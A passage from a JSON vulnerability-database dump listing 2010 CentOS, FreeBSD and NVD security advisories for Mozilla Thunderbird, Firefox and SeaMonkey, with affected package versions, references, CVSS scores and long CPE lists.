"CentOS", "OSVersion": "4", "packageVersion": "1.5.0.12-31.el4.centos", "packageFilename": "thunderbird-1.5.0.12-31.el4.centos.i386.rpm", "packageName": "thunderbird", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.0.0.24-9.el5.centos", "packageFilename": "thunderbird-2.0.0.24-9.el5.centos.x86_64.rpm", "packageName": "thunderbird", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.0.0.24-9.el5.centos", "packageFilename": "thunderbird-2.0.0.24-9.el5.centos.i386.rpm", "packageName": "thunderbird", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.0.0.24-9.el5.centos", "packageFilename": "thunderbird-2.0.0.24-9.el5.centos.src.rpm", "packageName": "thunderbird", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.0.0.24-9.el5.centos", "packageFilename": "thunderbird-2.0.0.24-9.el5.centos.src.rpm", "packageName": "thunderbird", "arch": "any", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2010:0780\n\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nSeveral flaws were found in the processing of malformed HTML mail content.\nAn HTML mail message containing malicious content could cause Thunderbird\nto crash or, potentially, execute arbitrary code with the privileges of the\nuser running Thunderbird. (CVE-2010-3176, CVE-2010-3180)\n\nNote: JavaScript support is disabled by default in Thunderbird. The above\nissues are not exploitable unless JavaScript is enabled.\n\nA flaw was found in the script that launches Thunderbird. The\nLD_LIBRARY_PATH variable was appending a \".\" character, which could allow a\nlocal attacker to execute arbitrary code with the privileges of a different\nuser running Thunderbird, if that user ran Thunderbird from within an\nattacker-controlled directory. (CVE-2010-3182)\n\nAll Thunderbird users should upgrade to this updated package, which\nresolves these issues. All running instances of Thunderbird must be\nrestarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017091.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017092.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017109.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017110.html\n\n**Affected packages:**\nthunderbird\n\n**Upstream details at:**\n\nhttps://rhn.redhat.com/errata/RHSA-2010-0780.html", "edition": 1, "reporter": "CentOS Project", "published": "2010-10-20T10:21:34", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "thunderbird security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3182"], "modified": "2010-10-25T08:19:16", "href": "http://lists.centos.org/pipermail/centos-announce/2010-October/017091.html", "id": "CESA-2010:0780", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2018-08-31T01:15:18", "references": ["http://www.mozilla.org/security/announce/2010/mfsa2010-67.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-68.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-66.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-64.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-69.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-72.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-65.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-70.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-71.html"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "3.5.14", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-firefox-devel", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "3.6.11,1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-firefox", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "2.0.9", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "seamonkey", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "3.0", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "thunderbird", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.9.2.11", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libxul", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "3.6.11,1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "firefox", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "3.0.9", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "thunderbird", "operator": "lt"}], "description": "\nThe Mozilla Project reports:\n\nMFSA 2010-64 Miscellaneous memory safety hazards (rv:1.9.2.11/ 1.9.1.14)\nMFSA 2010-65 Buffer overflow and memory corruption using document.write\nMFSA 2010-66 Use-after-free error in nsBarProp\nMFSA 2010-67 Dangling pointer vulnerability in LookupGetterOrSetter\nMFSA 2010-68 XSS in gopher parser when parsing hrefs\nMFSA 2010-69 Cross-site information disclosure via modal calls\nMFSA 2010-70 SSL wildcard certificate matching IP addresses\nMFSA 2010-71 Unsafe library loading vulnerabilities\nMFSA 2010-72 Insecure Diffie-Hellman key exchange\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2010-10-19T00:00:00", "title": "mozilla -- multiple vulnerabilities", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3177", "CVE-2010-3178", "CVE-2010-3181", "CVE-2010-3176", "CVE-2010-3174", "CVE-2010-3180", "CVE-2010-3173", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3170", "CVE-2010-3183"], "modified": "2010-10-19T00:00:00", "id": "C4F067B9-DC4A-11DF-8E32-000F20797EDE", "href": "https://vuxml.freebsd.org/freebsd/c4f067b9-dc4a-11df-8e32-000f20797ede.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:15:18", "references": ["http://www.mozilla.org/security/announce/2010/mfsa2010-73.html"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "3.0.10", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "thunderbird", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "2.0.10", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "seamonkey", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "2.0.10", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-seamonkey", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "3.6.12,1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "firefox", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "3.1.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-thunderbird", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "3.0", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "thunderbird", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "3.6.12,1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-firefox", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.9.2.12", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libxul", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "3.5.15", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-firefox-devel", "operator": "lt"}], "description": "\nThe Mozilla Project reports:\n\nMFSA 2010-73 Heap buffer overflow mixing document.write and DOM insertion\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2010-10-27T00:00:00", "title": "mozilla -- Heap buffer overflow mixing document.write and DOM insertion", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3765"], "modified": "2010-10-27T00:00:00", "id": "C223B00D-E272-11DF-8E32-000F20797EDE", "href": "https://vuxml.freebsd.org/freebsd/c223b00d-e272-11df-8e32-000f20797ede.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2017-09-19T13:37:04", "references": ["http://blogs.sun.com/security/entry/multiple_vulnerabilities_in_mozilla_firefox", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050077.html", "http://www.redhat.com/support/errata/RHSA-2010-0861.html", "http://www.ubuntu.com/usn/USN-997-1", "http://www.redhat.com/support/errata/RHSA-2010-0896.html", "https://bugzilla.mozilla.org/show_bug.cgi?id=583077", "http://www.ubuntu.com/usn/USN-998-1", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:210", "http://www.debian.org/security/2010/dsa-2124", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050154.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-65.html", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:211", "http://support.avaya.com/css/P8/documents/100120156", "http://www.vupen.com/english/advisories/2011/0061", "http://www.redhat.com/support/errata/RHSA-2010-0782.html"], "description": "Stack-based buffer overflow in the text-rendering functionality in Mozilla Firefox before 3.5.14 and 3.6.x before 3.6.11, Thunderbird before 3.0.9 and 3.1.x before 3.1.5, and SeaMonkey before 2.0.9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a long argument to the document.write method.", "edition": 2, "reporter": "NVD", "published": "2010-10-21T15:00:03", "title": "CVE-2010-3179", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:37:04", "vector": "NONE", "value": 6.8}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11675", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11675"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-3179"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11675", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:11675"}], "modified": "2017-09-18T21:31:16", "cpe": ["cpe:/a:mozilla:seamonkey:1.0.8", "cpe:/a:mozilla:firefox:2.0.0.9", "cpe:/a:mozilla:thunderbird:1.5.0.10", "cpe:/a:mozilla:thunderbird:3.0.6", "cpe:/a:mozilla:firefox:3.0.2", "cpe:/a:mozilla:firefox:3.5.6", "cpe:/a:mozilla:firefox:1.5.0.3", "cpe:/a:mozilla:thunderbird:3.0.2", "cpe:/a:mozilla:seamonkey:2.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.3", "cpe:/a:mozilla:seamonkey:2.0", "cpe:/a:mozilla:thunderbird:2.0.0.9", "cpe:/a:mozilla:firefox:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.14", "cpe:/a:mozilla:firefox:3.5.12", "cpe:/a:mozilla:seamonkey:2.0.7", "cpe:/a:mozilla:firefox:2.0.0.18", "cpe:/a:mozilla:firefox:2.0.0.8", "cpe:/a:mozilla:thunderbird:0.7", "cpe:/a:mozilla:thunderbird:3.0", "cpe:/a:mozilla:firefox:3.0.12", "cpe:/a:mozilla:firefox:1.5.1", "cpe:/a:mozilla:firefox:1.5.4", "cpe:/a:mozilla:seamonkey:1.1.17", "cpe:/a:mozilla:seamonkey:1.0.2", "cpe:/a:mozilla:thunderbird:1.5:beta2", "cpe:/a:mozilla:seamonkey:1.1.2", "cpe:/a:mozilla:firefox:2.0.0.13", "cpe:/a:mozilla:seamonkey:1.5.0.10", "cpe:/a:mozilla:seamonkey:1.1.18", "cpe:/a:mozilla:seamonkey:2.0:beta_2", "cpe:/a:mozilla:thunderbird:2.0.0.21", "cpe:/a:mozilla:seamonkey:1.1:beta", "cpe:/a:mozilla:seamonkey:2.0.3", "cpe:/a:mozilla:seamonkey:1.0", "cpe:/a:mozilla:seamonkey:2.0:beta_1", "cpe:/a:mozilla:firefox:3.5.3", "cpe:/a:mozilla:seamonkey:1.5.0.9", "cpe:/a:mozilla:firefox:2.0.0.3", "cpe:/a:mozilla:thunderbird:1.0.8", "cpe:/a:mozilla:firefox:2.0.0.2", "cpe:/a:mozilla:firefox:1.5.0.1", "cpe:/a:mozilla:firefox:3.6.7", "cpe:/a:mozilla:firefox:3.6.2", "cpe:/a:mozilla:firefox:2.0.0.12", "cpe:/a:mozilla:firefox:3.5.13", "cpe:/a:mozilla:thunderbird:3.0.7", "cpe:/a:mozilla:firefox:3.0.4", "cpe:/a:mozilla:seamonkey:1.0.9", "cpe:/a:mozilla:firefox:3.0.14", "cpe:/a:mozilla:firefox:3.6.4", "cpe:/a:mozilla:firefox:1.5.7", "cpe:/a:mozilla:thunderbird:1.0.4", "cpe:/a:mozilla:thunderbird:2.0.0.22", "cpe:/a:mozilla:firefox:1.0.5", "cpe:/a:mozilla:thunderbird:2.0.0.12", "cpe:/a:mozilla:thunderbird:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.17", "cpe:/a:mozilla:thunderbird:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.1.15", "cpe:/a:mozilla:firefox:2.0", "cpe:/a:mozilla:thunderbird:1.5.0.4", "cpe:/a:mozilla:firefox:1.0:preview_release", "cpe:/a:mozilla:firefox:1.0", "cpe:/a:mozilla:firefox:2.0.0.20", "cpe:/a:mozilla:thunderbird:3.1", "cpe:/a:mozilla:firefox:1.5:beta1", "cpe:/a:mozilla:firefox:1.0.3", "cpe:/a:mozilla:firefox:2.0.0.10", "cpe:/a:mozilla:seamonkey:1.1.9", "cpe:/a:mozilla:thunderbird:1.5.0.6", "cpe:/a:mozilla:seamonkey:2.0:rc1", "cpe:/a:mozilla:thunderbird:1.0", "cpe:/a:mozilla:firefox:1.5.0.5", "cpe:/a:mozilla:firefox:1.5.0.12", "cpe:/a:mozilla:thunderbird:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.10", "cpe:/a:mozilla:firefox:3.5.5", "cpe:/a:mozilla:firefox:3.0.5", "cpe:/a:mozilla:seamonkey:1.1.12", "cpe:/a:mozilla:thunderbird:1.5.2", "cpe:/a:mozilla:firefox:3.6", "cpe:/a:mozilla:thunderbird:3.1.3", "cpe:/a:mozilla:thunderbird:1.5.0.1", "cpe:/a:mozilla:firefox:1.5.6", "cpe:/a:mozilla:seamonkey:2.0.8", "cpe:/a:mozilla:firefox:1.5:beta2", "cpe:/a:mozilla:firefox:1.0.4", "cpe:/a:mozilla:seamonkey:1.1.6", "cpe:/a:mozilla:thunderbird:3.0.3", "cpe:/a:mozilla:thunderbird:0.4", "cpe:/a:mozilla:firefox:2.0.0.7", "cpe:/a:mozilla:firefox:3.5.1", "cpe:/a:mozilla:seamonkey:2.0:rc2", "cpe:/a:mozilla:firefox:3.5.7", "cpe:/a:mozilla:thunderbird:2.0.0.23", "cpe:/a:mozilla:firefox:1.0.7", "cpe:/a:mozilla:seamonkey:1.1.5", "cpe:/a:mozilla:firefox:1.0.6", "cpe:/a:mozilla:seamonkey:1.1:alpha", "cpe:/a:mozilla:thunderbird:0.7.2", "cpe:/a:mozilla:firefox:3.0.9", "cpe:/a:mozilla:firefox:3.6.8", "cpe:/a:mozilla:firefox:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.4", "cpe:/a:mozilla:thunderbird:2.0.0.19", "cpe:/a:mozilla:thunderbird:3.0.8", "cpe:/a:mozilla:thunderbird:0.6", "cpe:/a:mozilla:firefox:2.0.0.15", "cpe:/a:mozilla:seamonkey:2.0.4", "cpe:/a:mozilla:firefox:3.6.3", "cpe:/a:mozilla:thunderbird:2.0.0.7", "cpe:/a:mozilla:thunderbird:3.1.1", "cpe:/a:mozilla:firefox:3.6.9", "cpe:/a:mozilla:firefox:3.5", "cpe:/a:mozilla:firefox:1.5.0.10", "cpe:/a:mozilla:seamonkey:2.0:alpha_3", "cpe:/a:mozilla:thunderbird:3.1.2", "cpe:/a:mozilla:thunderbird:2.0.0.2", "cpe:/a:mozilla:thunderbird:1.5.0.13", "cpe:/a:mozilla:thunderbird:0.8", "cpe:/a:mozilla:firefox:1.0.2", "cpe:/a:mozilla:thunderbird:2.0.0.5", "cpe:/a:mozilla:seamonkey:1.0.6", "cpe:/a:mozilla:firefox:3.0.16", "cpe:/a:mozilla:firefox:1.5.8", "cpe:/a:mozilla:seamonkey:2.0.2", "cpe:/a:mozilla:firefox:3.0.13", "cpe:/a:mozilla:seamonkey:1.0.4", "cpe:/a:mozilla:seamonkey:1.0.5", "cpe:/a:mozilla:thunderbird:0.7.1", "cpe:/a:mozilla:seamonkey:1.0:alpha", "cpe:/a:mozilla:firefox:1.5.5", "cpe:/a:mozilla:firefox:3.0.11", "cpe:/a:mozilla:firefox:1.5.0.4", "cpe:/a:mozilla:thunderbird:1.5.0.12", "cpe:/a:mozilla:firefox:2.0.0.1", "cpe:/a:mozilla:firefox:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.0.7", "cpe:/a:mozilla:thunderbird:2.0.0.3", "cpe:/a:mozilla:firefox:1.5.2", "cpe:/a:mozilla:seamonkey:2.0:alpha_1", "cpe:/a:mozilla:seamonkey:1.1.11", "cpe:/a:mozilla:seamonkey:1.1.3", "cpe:/a:mozilla:thunderbird:3.0.4", "cpe:/a:mozilla:thunderbird:0.7.3", "cpe:/a:mozilla:firefox:1.5.0.11", "cpe:/a:mozilla:thunderbird:1.0.5", "cpe:/a:mozilla:thunderbird:1.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.3", "cpe:/a:mozilla:firefox:1.5.0.6", "cpe:/a:mozilla:thunderbird:2.0", "cpe:/a:mozilla:firefox:2.0.0.6", "cpe:/a:mozilla:thunderbird:2.0.0.1", "cpe:/a:mozilla:firefox:2.0.0.5", "cpe:/a:mozilla:firefox:1.5", "cpe:/a:mozilla:firefox:3.0.6", "cpe:/a:mozilla:seamonkey:1.1.1", "cpe:/a:mozilla:firefox:1.5.0.7", "cpe:/a:mozilla:seamonkey:1.1.7", "cpe:/a:mozilla:thunderbird:1.5.0.14", "cpe:/a:mozilla:thunderbird:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5", "cpe:/a:mozilla:seamonkey:2.0.5", "cpe:/a:mozilla:firefox:3.5.8", "cpe:/a:mozilla:seamonkey:1.5.0.8", "cpe:/a:mozilla:thunderbird:2.0.0.0", "cpe:/a:mozilla:thunderbird:3.0.5", "cpe:/a:mozilla:firefox:3.0.15", "cpe:/a:mozilla:firefox:3.0.7", "cpe:/a:mozilla:seamonkey:1.1.14", "cpe:/a:mozilla:seamonkey:1.1.16", "cpe:/a:mozilla:seamonkey:2.0:alpha_2", "cpe:/a:mozilla:firefox:3.0", "cpe:/a:mozilla:thunderbird:3.1.4", "cpe:/a:mozilla:firefox:1.5.3", "cpe:/a:mozilla:firefox:3.5.11", "cpe:/a:mozilla:thunderbird:2.0.0.17", "cpe:/a:mozilla:thunderbird:1.0.2", "cpe:/a:mozilla:firefox:3.0.10", "cpe:/a:mozilla:thunderbird:0.5", "cpe:/a:mozilla:firefox:3.0.8", "cpe:/a:mozilla:firefox:1.0.8", "cpe:/a:mozilla:firefox:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.1", "cpe:/a:mozilla:seamonkey:1.0:beta", "cpe:/a:mozilla:firefox:3.5.4", "cpe:/a:mozilla:thunderbird:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.3", "cpe:/a:mozilla:thunderbird:1.5.1", "cpe:/a:mozilla:firefox:3.5.9", "cpe:/a:mozilla:firefox:3.6.10", "cpe:/a:mozilla:seamonkey:1.1", "cpe:/a:mozilla:thunderbird:1.0.7", "cpe:/a:mozilla:firefox:3.5.2", "cpe:/a:mozilla:firefox:2.0.0.16", "cpe:/a:mozilla:thunderbird:0.2", "cpe:/a:mozilla:thunderbird:1.5.0.5", "cpe:/a:mozilla:firefox:3.5.10", "cpe:/a:mozilla:firefox:3.6.6", "cpe:/a:mozilla:seamonkey:1.1.19", "cpe:/a:mozilla:thunderbird:2.0.0.16", "cpe:/a:mozilla:firefox:2.0.0.19", "cpe:/a:mozilla:firefox:3.0.17", "cpe:/a:mozilla:thunderbird:1.5.0.11", "cpe:/a:mozilla:thunderbird:0.1", "cpe:/a:mozilla:firefox:2.0.0.11", "cpe:/a:mozilla:thunderbird:2.0.0.14", "cpe:/a:mozilla:firefox:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5.0.7", "cpe:/a:mozilla:seamonkey:2.0.1", "cpe:/a:mozilla:thunderbird:0.9", "cpe:/a:mozilla:thunderbird:2.0.0.8", "cpe:/a:mozilla:thunderbird:1.0.3", "cpe:/a:mozilla:thunderbird:2.0.0.18", "cpe:/a:mozilla:seamonkey:1.1.8", "cpe:/a:mozilla:thunderbird:0.3", "cpe:/a:mozilla:thunderbird:2.0.0.6", "cpe:/a:mozilla:seamonkey:1.1.13"], "id": "CVE-2010-3179", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3179", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-19T13:37:04", "references": ["https://bugzilla.mozilla.org/show_bug.cgi?id=559344", "http://www.redhat.com/support/errata/RHSA-2010-0781.html", "https://bugzilla.mozilla.org/show_bug.cgi?id=509075", "https://bugzilla.mozilla.org/show_bug.cgi?id=568303", "https://bugzilla.mozilla.org/show_bug.cgi?id=583957", "https://bugzilla.mozilla.org/show_bug.cgi?id=566141", "http://blogs.sun.com/security/entry/multiple_vulnerabilities_in_mozilla_firefox", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050077.html", "https://bugzilla.mozilla.org/show_bug.cgi?id=568073", "http://www.redhat.com/support/errata/RHSA-2010-0861.html", "https://bugzilla.mozilla.org/show_bug.cgi?id=594760", "http://support.avaya.com/css/P8/documents/100114250", "http://www.securityfocus.com/bid/44243", "http://www.ubuntu.com/usn/USN-997-1", "http://www.redhat.com/support/errata/RHSA-2010-0896.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-64.html", "http://www.ubuntu.com/usn/USN-998-1", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:210", "http://www.debian.org/security/2010/dsa-2124", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050154.html", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:211", "https://bugzilla.mozilla.org/show_bug.cgi?id=580151", "http://support.avaya.com/css/P8/documents/100120156", "http://www.redhat.com/support/errata/RHSA-2010-0780.html", "http://www.vupen.com/english/advisories/2011/0061", "http://www.redhat.com/support/errata/RHSA-2010-0782.html"], "description": "Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox 3.5.x before 3.5.14 and 3.6.x before 3.6.11, Thunderbird before 3.0.9 and 3.1.x before 3.1.5, and SeaMonkey before 2.0.9 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.", "edition": 2, "reporter": "NVD", "published": "2010-10-21T15:00:02", "title": "CVE-2010-3176", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:37:04", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:12132", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12132"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-3176"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:12132", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:12132"}], "modified": "2017-09-18T21:31:16", "cpe": ["cpe:/a:mozilla:seamonkey:1.0.8", "cpe:/a:mozilla:thunderbird:1.5.0.10", "cpe:/a:mozilla:thunderbird:3.0.6", "cpe:/a:mozilla:firefox:3.5.6", "cpe:/a:mozilla:thunderbird:3.0.2", "cpe:/a:mozilla:seamonkey:2.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.3", "cpe:/a:mozilla:seamonkey:2.0", "cpe:/a:mozilla:thunderbird:2.0.0.9", "cpe:/a:mozilla:firefox:3.5.12", "cpe:/a:mozilla:seamonkey:2.0.7", "cpe:/a:mozilla:thunderbird:0.7", "cpe:/a:mozilla:thunderbird:3.0", "cpe:/a:mozilla:seamonkey:1.1.17", "cpe:/a:mozilla:seamonkey:1.0.2", "cpe:/a:mozilla:thunderbird:1.5:beta2", "cpe:/a:mozilla:seamonkey:1.1.2", "cpe:/a:mozilla:seamonkey:1.5.0.10", "cpe:/a:mozilla:seamonkey:1.1.18", "cpe:/a:mozilla:seamonkey:2.0:beta_2", "cpe:/a:mozilla:thunderbird:2.0.0.21", "cpe:/a:mozilla:seamonkey:1.1:beta", "cpe:/a:mozilla:seamonkey:2.0.3", "cpe:/a:mozilla:seamonkey:1.0", "cpe:/a:mozilla:seamonkey:2.0:beta_1", "cpe:/a:mozilla:firefox:3.5.3", "cpe:/a:mozilla:seamonkey:1.5.0.9", "cpe:/a:mozilla:thunderbird:1.0.8", "cpe:/a:mozilla:firefox:3.6.7", "cpe:/a:mozilla:firefox:3.6.2", "cpe:/a:mozilla:firefox:3.5.13", "cpe:/a:mozilla:thunderbird:3.0.7", "cpe:/a:mozilla:seamonkey:1.0.9", "cpe:/a:mozilla:firefox:3.6.4", "cpe:/a:mozilla:thunderbird:1.0.4", "cpe:/a:mozilla:thunderbird:2.0.0.22", "cpe:/a:mozilla:thunderbird:2.0.0.12", "cpe:/a:mozilla:thunderbird:1.5.0.2", "cpe:/a:mozilla:thunderbird:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.1.15", "cpe:/a:mozilla:thunderbird:1.5.0.4", "cpe:/a:mozilla:thunderbird:3.1", "cpe:/a:mozilla:seamonkey:1.1.9", "cpe:/a:mozilla:thunderbird:1.5.0.6", "cpe:/a:mozilla:seamonkey:2.0:rc1", "cpe:/a:mozilla:thunderbird:1.0", "cpe:/a:mozilla:thunderbird:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.10", "cpe:/a:mozilla:firefox:3.5.5", "cpe:/a:mozilla:seamonkey:1.1.12", "cpe:/a:mozilla:thunderbird:1.5.2", "cpe:/a:mozilla:firefox:3.6", "cpe:/a:mozilla:thunderbird:3.1.3", "cpe:/a:mozilla:thunderbird:1.5.0.1", "cpe:/a:mozilla:seamonkey:2.0.8", "cpe:/a:mozilla:seamonkey:1.1.6", "cpe:/a:mozilla:thunderbird:3.0.3", "cpe:/a:mozilla:thunderbird:0.4", "cpe:/a:mozilla:firefox:3.5.1", "cpe:/a:mozilla:seamonkey:2.0:rc2", "cpe:/a:mozilla:firefox:3.5.7", "cpe:/a:mozilla:thunderbird:2.0.0.23", "cpe:/a:mozilla:seamonkey:1.1.5", "cpe:/a:mozilla:seamonkey:1.1:alpha", "cpe:/a:mozilla:thunderbird:0.7.2", "cpe:/a:mozilla:firefox:3.6.8", "cpe:/a:mozilla:seamonkey:1.1.4", "cpe:/a:mozilla:thunderbird:2.0.0.19", "cpe:/a:mozilla:thunderbird:3.0.8", "cpe:/a:mozilla:thunderbird:0.6", "cpe:/a:mozilla:seamonkey:2.0.4", "cpe:/a:mozilla:firefox:3.6.3", "cpe:/a:mozilla:thunderbird:2.0.0.7", "cpe:/a:mozilla:thunderbird:3.1.1", "cpe:/a:mozilla:firefox:3.6.9", "cpe:/a:mozilla:firefox:3.5", "cpe:/a:mozilla:seamonkey:2.0:alpha_3", "cpe:/a:mozilla:thunderbird:3.1.2", "cpe:/a:mozilla:thunderbird:2.0.0.2", "cpe:/a:mozilla:thunderbird:1.5.0.13", "cpe:/a:mozilla:thunderbird:0.8", "cpe:/a:mozilla:thunderbird:2.0.0.5", "cpe:/a:mozilla:seamonkey:1.0.6", "cpe:/a:mozilla:seamonkey:2.0.2", "cpe:/a:mozilla:seamonkey:1.0.4", "cpe:/a:mozilla:seamonkey:1.0.5", "cpe:/a:mozilla:thunderbird:0.7.1", "cpe:/a:mozilla:seamonkey:1.0:alpha", "cpe:/a:mozilla:thunderbird:1.5.0.12", "cpe:/a:mozilla:seamonkey:1.0.7", "cpe:/a:mozilla:thunderbird:2.0.0.3", "cpe:/a:mozilla:seamonkey:2.0:alpha_1", "cpe:/a:mozilla:seamonkey:1.1.11", "cpe:/a:mozilla:seamonkey:1.1.3", "cpe:/a:mozilla:thunderbird:3.0.4", "cpe:/a:mozilla:thunderbird:0.7.3", "cpe:/a:mozilla:thunderbird:1.0.5", "cpe:/a:mozilla:thunderbird:1.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.8", "cpe:/a:mozilla:thunderbird:2.0", "cpe:/a:mozilla:thunderbird:2.0.0.1", "cpe:/a:mozilla:seamonkey:1.1.1", "cpe:/a:mozilla:seamonkey:1.1.7", "cpe:/a:mozilla:thunderbird:1.5.0.14", "cpe:/a:mozilla:thunderbird:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5", "cpe:/a:mozilla:seamonkey:2.0.5", "cpe:/a:mozilla:firefox:3.5.8", "cpe:/a:mozilla:seamonkey:1.5.0.8", "cpe:/a:mozilla:thunderbird:2.0.0.0", 